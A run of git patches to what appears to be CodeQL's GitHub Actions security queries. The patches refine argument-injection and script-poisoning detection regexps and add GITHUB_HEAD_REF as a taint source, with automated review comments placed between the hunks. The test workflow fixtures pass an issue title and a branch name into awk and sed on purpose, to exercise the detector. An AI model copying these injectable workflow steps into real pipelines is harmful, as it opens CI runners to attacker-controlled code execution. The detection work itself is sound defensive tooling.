awk "BEGIN {$TITLE}" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | awk | diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected index c2ff2885a99..67f728705f4 100644 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected 
@@ -2,10 +2,12 @@ edges | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | provenance | | | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | | | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | provenance | | nodes | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | +| .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | subpaths #select From f4581d0aa5e5b1dc0decd50e4ffa39af3e1da758 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Jul 2024 11:36:18 +0200 Subject: [PATCH 0400/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 79545959a7d..e5e89afc471 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml 
@@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.17 +version: 0.1.18 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 30ed4dc6dae..db9bdecf8b8 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.17 +version: 0.1.18 groups: [actions, queries] suites: codeql-suites extractor: javascript From 7a54170b3129ea5facabf0e3fb2a0b98fcebc480 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Jul 2024 12:59:34 +0200 Subject: [PATCH 0401/1267] feat(ext): Move regexp delimiters to Config.qll --- ql/lib/codeql/actions/config/Config.qll | 41 +++++++++++-------- .../actions/security/PoisonableSteps.qll | 11 +---- 2 files changed, 27 insertions(+), 25 deletions(-) diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index 8d97e63786b..3b273302fec 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -51,7 +51,11 @@ predicate externallyTriggerableEventsDataModel(string event) { * - regexp: Regular expression for matching poisonable commands */ predicate poisonableCommandsDataModel(string regexp) { - Extensions::poisonableCommandsDataModel(regexp) + exists(string sub_regexp | + Extensions::poisonableCommandsDataModel(sub_regexp) and + // find regexp + regexp = "(^|\\b|\\s+)" + sub_regexp + "(\\s|;|\\||\\)|`|-|&&|[a-zA-Z]|$)" + ) } /** 
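Review bot: The comment `// find regexp` in `poisonableCommandsDataModel` does not say why this wrapper has no surrounding `.*` while the `// capture regexp` wrappers added in the same commit do. The reason visible in PoisonableSteps.qll is that this result is passed to `regexpFind`, a substring search, whereas the local-script regexp goes to `regexpCapture`, which has to match the whole line. A comment such as `// used with regexpFind (substring search), so no leading/trailing .* is needed` would stop a later edit from aligning the three wrappers by mistake.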
@@ -61,7 +65,26 @@ predicate poisonableCommandsDataModel(string regexp) { * - group: Script capture group number for the regular expression */ predicate poisonableLocalScriptsDataModel(string regexp, int group) { - Extensions::poisonableLocalScriptsDataModel(regexp, group) + exists(string sub_regexp | + Extensions::poisonableLocalScriptsDataModel(sub_regexp, group) and + // capture regexp + regexp = ".*(^|;|\\$\\(|`|\\||&&|\\|\\|)\\s*" + sub_regexp + "\\s*(;|\\||\\)|`|-|&&|$|\\|\\|).*" + ) +} + +/** + * MaD models for arguments to commands that execute the given argument. + * Fields: + * - regexp: Regular expression for matching argument injections. + * - command_group: capture group for the command. + * - argument_group: capture group for the argument. + */ +predicate argumentInjectionSinksDataModel(string regexp, int command_group, int argument_group) { + exists(string sub_regexp | + Extensions::argumentInjectionSinksDataModel(sub_regexp, command_group, argument_group) and + // capture regexp + regexp = ".*(^|;|\\$\\(|`|\\||&&|\\|\\|)\\s*" + sub_regexp + "\\s*(;|\\||\\)|`|-|&&|$|\\|\\|).*" + ) } /** @@ -82,17 +105,3 @@ predicate poisonableActionsDataModel(string action) { predicate untrustedEventPropertiesDataModel(string property, string kind) { Extensions::untrustedEventPropertiesDataModel(property, kind) } - -/** - * MaD models for arguments to commands that execute the given argument. - * Fields: - * - regexp: Regular expression for matching argument injections. - * - command_group: capture group for the command. - * - argument_group: capture group for the argument. - */ -predicate argumentInjectionSinksDataModel(string regexp, int command_group, int argument_group) { - exists(string sub_regexp | - Extensions::argumentInjectionSinksDataModel(sub_regexp, command_group, argument_group) and - regexp = ".*(^|;|\\$\\(|`|\\||&&)\\s*" + sub_regexp + "\\s*(;|\\||\\)|`|-|&&|$).*" - ) -} 
diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 34246fa4e8f..6a218ac08f1 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -18,12 +18,7 @@ class PoisonableCommandStep extends PoisonableStep, Run { PoisonableCommandStep() { exists(string regexp | poisonableCommandsDataModel(regexp) and - exists( - this.getScript() - .splitAt("\n") - .trim() - .regexpFind("(^|\\b|\\s+)" + regexp + "(\\s|;|\\||\\)|`|-|&&|[a-zA-Z]|$)", _, _) - ) + exists(this.getScript().splitAt("\n").trim().regexpFind(regexp, _, _)) ) } } @@ -46,9 +41,7 @@ class LocalScriptExecutionRunStep extends PoisonableStep, Run { LocalScriptExecutionRunStep() { exists(string line, string regexp, int group | line = this.getScript().splitAt("\n").trim() | poisonableLocalScriptsDataModel(regexp, group) and - cmd = - line.regexpCapture(".*(^|;|\\$\\(|`|\\||&&)\\s*" + regexp + "\\s*(;|\\||\\)|`|-|&&|$).*", - group) + cmd = line.regexpCapture(regexp, group) ) } From 89024ad6048ba00083b23b4c8946ec5cd8df4c7d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Jul 2024 22:58:20 +0200 Subject: [PATCH 0402/1267] fix(models): Reuse command delimiter regexps --- ql/lib/codeql/actions/config/Config.qll | 19 ++++++++++++++----- .../security/ArtifactPoisoningQuery.qll | 5 ++++- .../actions/security/PoisonableSteps.qll | 8 +++++--- ql/lib/ext/config/poisonable_steps.yml | 16 ++++++++-------- .../.github/workflows/poisonable_steps.yml | 1 + .../ArgumentInjectionCritical.expected | 2 ++ .../CWE-094/ArgumentInjectionMedium.expected | 1 + 7 files changed, 35 insertions(+), 17 deletions(-) diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index 3b273302fec..efd8b26510b 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll 
@@ -45,6 +45,12 @@ predicate externallyTriggerableEventsDataModel(string event) { Extensions::externallyTriggerableEventsDataModel(event) } +private string commandLauncher() { result = ["", "sudo\\s+", "su\\s+", "xvfb-run\\s+"] } + +private string commandPrefixDelimiter() { result = "(^|;|\\$\\(|`|\\||&&|\\|\\|)\\s*" } + +private string commandSuffixDelimiter() { result = "\\s*(;|\\||\\)|`|&&|\\|\\||$)" } + /** * MaD models for poisonable commands * Fields: @@ -54,7 +60,8 @@ predicate poisonableCommandsDataModel(string regexp) { exists(string sub_regexp | Extensions::poisonableCommandsDataModel(sub_regexp) and // find regexp - regexp = "(^|\\b|\\s+)" + sub_regexp + "(\\s|;|\\||\\)|`|-|&&|[a-zA-Z]|$)" + regexp = + commandPrefixDelimiter() + commandLauncher() + sub_regexp + "(.*?)" + commandSuffixDelimiter() ) } @@ -64,11 +71,13 @@ predicate poisonableCommandsDataModel(string regexp) { * - regexp: Regular expression for matching poisonable local scripts * - group: Script capture group number for the regular expression */ -predicate poisonableLocalScriptsDataModel(string regexp, int group) { +predicate poisonableLocalScriptsDataModel(string regexp, int command_group) { exists(string sub_regexp | - Extensions::poisonableLocalScriptsDataModel(sub_regexp, group) and + Extensions::poisonableLocalScriptsDataModel(sub_regexp, command_group) and // capture regexp - regexp = ".*(^|;|\\$\\(|`|\\||&&|\\|\\|)\\s*" + sub_regexp + "\\s*(;|\\||\\)|`|-|&&|$|\\|\\|).*" + regexp = + ".*" + commandPrefixDelimiter() + commandLauncher() + sub_regexp + commandSuffixDelimiter() + + ".*" ) } 
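Review bot: The new private helpers `commandLauncher()`, `commandPrefixDelimiter()` and `commandSuffixDelimiter()` have no QLDoc, and they carry an unwritten invariant. The capture indices stored in the MaD rows assume that the prefix contributes exactly one capturing group and the launcher none. Each helper should get a one-line comment, and the one on `commandLauncher()` should state the constraint, for example `/** Gets a regexp for an optional wrapper such as sudo placed before the command; must not add capturing groups. */`.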
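Review bot: In `poisonableCommandsDataModel` the new prefix finds a command only at the start of a line or after `;`, `$(`, a backtick, `|`, `&&` or `||` (optionally followed by one of the three launchers), whereas the replaced prefix `(^|\\b|\\s+)` accepted any word boundary. Lines such as `NODE_ENV=production <command>`, `time <command>` or `then <command>` therefore stop being found by `regexpFind`, which costs detections rather than false positives. If the narrowing is intended it deserves a comment; otherwise the common cases can go into `commandLauncher()`, for instance a non-capturing alternative for leading assignments, `"(?:\\w+=\\S*\\s+)+"`. The sub-regexps are not part of this hunk, so the effect on individual models is inferred.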
@@ -83,7 +92,7 @@ predicate argumentInjectionSinksDataModel(string regexp, int command_group, int exists(string sub_regexp | Extensions::argumentInjectionSinksDataModel(sub_regexp, command_group, argument_group) and // capture regexp - regexp = ".*(^|;|\\$\\(|`|\\||&&|\\|\\|)\\s*" + sub_regexp + "\\s*(;|\\||\\)|`|-|&&|$|\\|\\|).*" + regexp = ".*" + commandPrefixDelimiter() + sub_regexp + commandSuffixDelimiter() + ".*" ) } diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index d2853591d61..dd409bdbae2 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -255,7 +255,10 @@ class ArtifactPoisoningSink extends DataFlow::Node { ) and ( not poisonable instanceof LocalScriptExecutionRunStep or - poisonable.(LocalScriptExecutionRunStep).getCommand().matches(download.getPath() + "%") + poisonable + .(LocalScriptExecutionRunStep) + .getCommand() + .matches(["./", ""] + download.getPath() + "%") ) ) } diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 6a218ac08f1..5dd0081f61e 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -39,9 +39,11 @@ class LocalScriptExecutionRunStep extends PoisonableStep, Run { string cmd; LocalScriptExecutionRunStep() { - exists(string line, string regexp, int group | line = this.getScript().splitAt("\n").trim() | - poisonableLocalScriptsDataModel(regexp, group) and - cmd = line.regexpCapture(regexp, group) + exists(string line, string regexp, int command_group | + line = this.getScript().splitAt("\n").trim() + | + poisonableLocalScriptsDataModel(regexp, command_group) and + cmd = line.regexpCapture(regexp, command_group) ) } 
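Review bot: `argumentInjectionSinksDataModel` builds its regexp without `commandLauncher()`, while the two poisonable-step predicates changed in this commit insert it between the prefix delimiter and the sub-regexp. As written, a line like `sudo sed "s/FOO/$TITLE/g"` does not match, because no delimiter stands directly before `sed`. Unless this is deliberate, the line should read `regexp = ".*" + commandPrefixDelimiter() + commandLauncher() + sub_regexp + commandSuffixDelimiter() + ".*"`. The launcher strings contain no capturing groups, so `command_group` and `argument_group` keep their values.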
diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 07fc7c7af73..7f07f696445 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -57,12 +57,12 @@ extensions: extensible: poisonableLocalScriptsDataModel data: # TODO: It could also be in the form of `dir/cmd` - - ["(\\.\\/)(.*)", 3] - - ["(\\.\\s+)(.*)", 3] # eg: . venv/bin/activate - - ["(source|sh|bash|zsh|fish)\\s+(.*)", 3] - - ["(node)\\s+(.*)(\\.js|\\.ts)", 3] - - ["(python)\\s+(.*)\\.py", 3] - - ["(ruby)\\s+(.*)\\.rb", 3] - - ["(go)\\s+(generate|run)\\s+(.*)\\.go", 4] - - ["(dotnet)\\s+(.*)\\.csproj", 3] + - ["(\\.\\/[a-zA-Z0-9\\-_\\./]+)(.*?)", 2] + - ["(\\.\\s+[a-zA-Z0-9\\-_\\./]+)(.*?)", 2] # eg: . venv/bin/activate + - ["(source|sh|bash|zsh|fish)\\s+(.*?)", 3] + - ["(node)\\s+(.*?)(\\.js|\\.ts)(.*?)", 3] + - ["(python)\\s+(.*?)\\.py(.*?)", 3] + - ["(ruby)\\s+(.*?)\\.rb(.*?)", 3] + - ["(go)\\s+(generate|run)\\s+(.*?)\\.go(.*?)", 4] + - ["(dotnet)\\s+(.*?)\\.csproj(.*?)", 3] diff --git a/ql/test/library-tests/.github/workflows/poisonable_steps.yml b/ql/test/library-tests/.github/workflows/poisonable_steps.yml index 37ec9c9ff71..fad7001ad5a 100644 --- a/ql/test/library-tests/.github/workflows/poisonable_steps.yml +++ b/ql/test/library-tests/.github/workflows/poisonable_steps.yml @@ -38,3 +38,4 @@ jobs: - run: sed -f config file.txt > foo.txt - run: echo "foo" | awk -f ./config.awk > foo.txt - run: gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo + - run: ./foo/cmd diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected index 13f4954eac3..b5d25bf0d13 100644 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected 
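Review bot: The rewritten row for sourced scripts, `["(\\.\\s+[a-zA-Z0-9\\-_\\./]+)(.*?)", 2]`, now captures the leading dot and whitespace together with the path, where the old row captured only the path (group 3). The path check changed in ArtifactPoisoningQuery.qll in this commit accepts a command that starts with the download path, or with `./` plus that path, so `. venv/bin/activate` would no longer satisfy it. This assumes `getCommand()` returns the captured group, which the hunks do not show. Keeping the dot outside the captured group avoids the mismatch: `["(\\.\\s+)([a-zA-Z0-9\\-_\\./]+)(.*?)", 3]`.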
@@ -9,9 +9,11 @@ nodes | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | +| .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | subpaths #select | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | sed | | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | sed | | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | sed | | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | awk | +| .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | sed | diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected index 67f728705f4..dfbf87174cc 100644 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected 
@@ -9,5 +9,6 @@ nodes | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | +| .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | subpaths #select From 3f8a791b2e5b7a7a82a22b475999c58f56d05112 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Jul 2024 22:59:20 +0200 Subject: [PATCH 0403/1267] fix(queries): Improve Argument Injection query Add GITHUB_HEAD_REF as a source --- .../security/ArgumentInjectionQuery.qll | 29 +++++++++++++++++-- .../security/UntrustedCheckoutQuery.qll | 2 +- .../.github/workflows/arg_injection.yml | 5 ++++ 3 files changed, 32 insertions(+), 4 deletions(-) diff --git a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll index bf29a1c8458..c13db5b8127 100644 --- a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll 
@@ -23,8 +23,19 @@ class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { ArgumentInjectionFromEnvVarSink() { exists(Run run, string var_name | envToArgInjSink(var_name, run, command) and - exists(run.getInScopeEnvVarExpr(var_name)) and - run.getScriptScalar() = this.asExpr() + run.getScriptScalar() = this.asExpr() and + exists(run.getInScopeEnvVarExpr(var_name)) + ) + or + exists( + Run run, string line, string argument, string regexp, int argument_group, int command_group + | + run.getScript().splitAt("\n") = line and + run.getScriptScalar() = this.asExpr() and + argumentInjectionSinksDataModel(regexp, command_group, argument_group) and + argument = line.regexpCapture(regexp, argument_group) and + command = line.regexpCapture(regexp, command_group) and + argument.regexpMatch(".*\\$(\\{)?(GITHUB_HEAD_REF).*") ) } @@ -45,7 +56,19 @@ class ArgumentInjectionFromMaDSink extends ArgumentInjectionSink { * that is used to construct and evaluate a code script. */ private module ArgumentInjectionConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + predicate isSource(DataFlow::Node source) { + source instanceof RemoteFlowSource + or + exists( + Run run, string argument, string line, string regexp, int command_group, int argument_group + | + run.getScriptScalar() = source.asExpr() and + run.getScript().splitAt("\n") = line and + argumentInjectionSinksDataModel(regexp, command_group, argument_group) and + argument = line.regexpCapture(regexp, argument_group) and + argument.regexpMatch(".*\\$(\\{)?(GITHUB_HEAD_REF).*") + ) + } predicate isSink(DataFlow::Node sink) { sink instanceof ArgumentInjectionSink } } diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index a0bf48f9beb..be0229a77c4 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll 
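Review bot: The pattern `".*\\$(\\{)?(GITHUB_HEAD_REF).*"` in the new disjunct of `ArgumentInjectionFromEnvVarSink` has no trailing word boundary, so an argument that expands a longer variable name (made-up example: `$GITHUB_HEAD_REF_SAFE`) is treated as the pull-request branch name. `".*\\$\\{?GITHUB_HEAD_REF\\b.*"` still accepts both the `$VAR` and `${VAR}` forms and drops the two unused capture groups. The same conjuncts are repeated in `isSource` in the next hunk of this file, so one private predicate shared by both would keep them in step. It could carry a QLDoc line such as `/** Holds if a line of \`run\` passes $GITHUB_HEAD_REF, which the runner sets from the PR branch name without any env: declaration, to a modelled command. */`.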
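Review bot: The new `isSource` disjunct marks the whole script scalar (`run.getScriptScalar()`) as tainted, and that is the same node every `ArgumentInjectionFromEnvVarSink` of the step is built on, so source and sink coincide with no flow step between them. In a multi-line `run:` script where one line passes `$GITHUB_HEAD_REF` to a modelled command and another passes an in-scope but constant env var to a modelled command, the second would presumably be reported as well, with the wrong command in the message. Consider accepting the sink only when its `command` is captured from the same `line` as the `GITHUB_HEAD_REF` argument, and add a mixed-script case to `arg_injection.yml`. `command_group` is bound but never used in this disjunct, so the call can read `argumentInjectionSinksDataModel(regexp, _, argument_group)`.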
+++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -62,7 +62,7 @@ predicate containsHeadRef(string s) { // heuristics "\\bhead\\.ref\\b", "\\bhead_ref\\b", "\\bpr_head_ref\\b", // env vars - "\\benv\\.GITHUB_HEAD_REF\\b", + "GITHUB_HEAD_REF", ], _, _) ) } diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml index 0956aea61bd..3f2f30a78a0 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml @@ -15,3 +15,8 @@ jobs: - run: echo "foo" | sed "s/FOO/$TITLE/g" > bar - run: echo $(echo "foo" | sed "s/FOO/$TITLE/g" > bar) - run: awk "BEGIN {$TITLE}" + - run: sed -i "s/git_branch = .*/git_branch = \"$GITHUB_HEAD_REF\"/" config.json + - run: | + # We consider | as a shell pipe so this one is not reported yet until + # we can better identify all the commands in a shell script + sed -i "s|git_branch = .*|git_branch = \"$GITHUB_HEAD_REF\"|" config.json From c5d31ce08c1d66a7965d79ee805927efd68605d1 Mon Sep 17 00:00:00 2001 
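Review bot: The replacement pattern `"GITHUB_HEAD_REF"` in `containsHeadRef` is the only entry in this list without `\\b` anchors, so it matches the name as a bare substring of any longer identifier (made-up example: `MY_GITHUB_HEAD_REF_COPY`). Dropping the `env\\.` prefix is what lets a plain `$GITHUB_HEAD_REF` in a script match, and `"\\bGITHUB_HEAD_REF\\b"` keeps that while staying consistent with the neighbouring heuristics. The predicate's opening lines are outside this hunk, so how the list is applied to `s` is not fully visible here.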
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 10:13:49 +0200 Subject: [PATCH 0404/1267] fix(refactor): Add comments and rename predicates --- .../codeql/actions/dataflow/ExternalFlow.qll | 43 ++++++++++++------- .../codeql/actions/dataflow/FlowSources.qll | 4 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 35 +++++++-------- .../dataflow/internal/DataFlowPrivate.qll | 18 +++----- .../security/ArgumentInjectionQuery.qll | 2 +- .../actions/security/CodeInjectionQuery.qll | 2 +- .../security/CommandInjectionQuery.qll | 2 +- .../security/EnvPathInjectionQuery.qll | 2 +- .../actions/security/EnvVarInjectionQuery.qll | 2 +- .../actions/security/RequestForgeryQuery.qll | 2 +- .../security/SecretExfiltrationQuery.qll | 2 +- .../Security/CWE-020/CompositeActionsSinks.ql | 2 +- .../CWE-020/ReusableWorkflowsSinks.ql | 2 +- 13 files changed, 61 insertions(+), 57 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 2cb8c56b147..1d1b0c6a719 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -10,7 +10,9 @@ private import actions * - output arg: To node (prefixed with either `env.` or `output.`) * - provenance: verification of the model */ -predicate actionsSourceModel(string action, string version, string output, string kind, string provenance) { +predicate actionsSourceModel( + string action, string version, string output, string kind, string provenance +) { Extensions::actionsSourceModel(action, version, output, kind, provenance) } 
@@ -39,12 +41,17 @@ predicate actionsSummaryModel( * - kind: sink kind * - provenance: verification of the model */ -predicate actionsSinkModel(string action, string version, string input, string kind, string provenance) { +predicate actionsSinkModel( + string action, string version, string input, string kind, string provenance +) { Extensions::actionsSinkModel(action, version, input, kind, provenance) } -predicate externallyDefinedSource(DataFlow::Node source, string sourceType, string fieldName) { - exists(Uses uses, string action, string version, string kind | +/** + * Holds if source.fieldName is a MaD-defined source of a given taint kind. + */ +predicate madSource(DataFlow::Node source, string kind, string fieldName) { + exists(Uses uses, string action, string version | actionsSourceModel(action, version, fieldName, kind, _) and uses.getCallee() = action.toLowerCase() and ( 
@@ -59,36 +66,40 @@ predicate externallyDefinedSource(DataFlow::Node source, string sourceType, stri if fieldName.trim().matches("output.%") then source.asExpr() = uses else none() - ) and - sourceType = kind + ) ) } -predicate externallyDefinedStoreStep( - DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c -) { +/** + * Holds if the data flow from `pred` to `succ` is a MaD store step. + */ +predicate madStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(Uses uses, string action, string version, string input, string output | actionsSummaryModel(action, version, input, output, "taint", _) and c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output.", "")) and uses.getCallee() = action.toLowerCase() and + // version check ( if version.trim() = "*" then uses.getVersion() = any(string v) else uses.getVersion() = version.trim() ) and + // pred provenance ( - if input.trim().matches("env.%") - then pred.asExpr() = uses.getInScopeEnvVarExpr(input.trim().replaceAll("env.", "")) - else - if input.trim().matches("input.%") - then pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) - else none() + input.trim().matches("env.%") and + pred.asExpr() = uses.getInScopeEnvVarExpr(input.trim().replaceAll("env.", "")) + or + input.trim().matches("input.%") and + pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) ) and succ.asExpr() = uses ) } -predicate externallyDefinedSink(DataFlow::Node sink, string kind) { +/** + * Holds if sink is a MaD-defined sink for a given taint kind. + */ +predicate madSink(DataFlow::Node sink, string kind) { exists(Uses uses, string action, string version, string input | actionsSinkModel(action, version, input, kind, _) and uses.getCallee() = action.toLowerCase() and diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 34f8c76df67..31cf33782b0 100644 
